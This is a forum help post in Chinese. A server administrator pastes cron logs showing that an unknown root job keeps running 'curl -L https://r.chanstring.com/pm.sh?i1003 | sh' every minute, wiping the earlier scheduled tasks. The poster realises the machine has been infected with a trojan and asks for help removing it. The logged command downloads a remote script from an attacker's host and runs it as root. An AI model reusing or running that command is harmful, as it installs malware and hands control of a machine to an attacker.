Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (authorized_keys) ORPHAN (no passwd entry)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (root) RELOAD (/var/spool/cron/root)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
Nov 19 04:52:01 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
...(此处省略很多与上一行一样的log)
Nov 19 04:52:02 iZ94uuwwfixZ crond[819]: (CRON) bad minute (/var/spool/cron/root)
Nov 19 04:52:02 iZ94uuwwfixZ CROND[2167]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:53:01 iZ94uuwwfixZ CROND[2179]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:54:01 iZ94uuwwfixZ CROND[2202]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:55:01 iZ94uuwwfixZ CROND[2217]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:56:01 iZ94uuwwfixZ CROND[2234]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:57:01 iZ94uuwwfixZ CROND[2252]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:58:01 iZ94uuwwfixZ CROND[2275]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 04:59:01 iZ94uuwwfixZ CROND[2285]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:00:01 iZ94uuwwfixZ CROND[2304]: (root) CMD (/usr/lib64/sa/sa1 1 1)
Nov 19 05:00:01 iZ94uuwwfixZ CROND[2305]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:01:01 iZ94uuwwfixZ CROND[2317]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:01:01 iZ94uuwwfixZ CROND[2318]: (root) CMD (run-parts /etc/cron.hourly)
Nov 19 05:01:01 iZ94uuwwfixZ run-parts(/etc/cron.hourly)[2318]: starting 0anacron
Nov 19 05:01:01 iZ94uuwwfixZ run-parts(/etc/cron.hourly)[2332]: finished 0anacron
Nov 19 05:01:01 iZ94uuwwfixZ run-parts(/etc/cron.hourly)[2318]: starting 0yum-hourly.cron
Nov 19 05:01:01 iZ94uuwwfixZ run-parts(/etc/cron.hourly)[2338]: finished 0yum-hourly.cron
Nov 19 05:02:01 iZ94uuwwfixZ CROND[2347]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:03:01 iZ94uuwwfixZ CROND[2357]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:04:01 iZ94uuwwfixZ CROND[2372]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
Nov 19 05:05:01 iZ94uuwwfixZ CROND[2387]: (root) CMD (curl -L https://r.chanstring.com/pm.sh?i1003 | sh)
请问这是为什么??直到这段日志的时间的前一分钟都是正常的,日志里也没有显示有人改过配置文件,为什么会变成这样?这是什么错误?这个直接导致了所有以前设置的定时任务都没有了
搜到有人是因为oracle
的配置问题。我用的是mysql,没有oracle,而且昨天使用过阿里云的数据迁移功能(是这台服务器数据迁出),用上了增量迁移,增量迁移停止的时间是Nov 19 02:33:00,出问题是2个半小时以后。
擦,知道为什么了,是服务器被种木马了,百度搜索“r.chanstring.com”出来很多结果,但是清除好像不简单,我再看看,希望有人告诉我杀毒方法…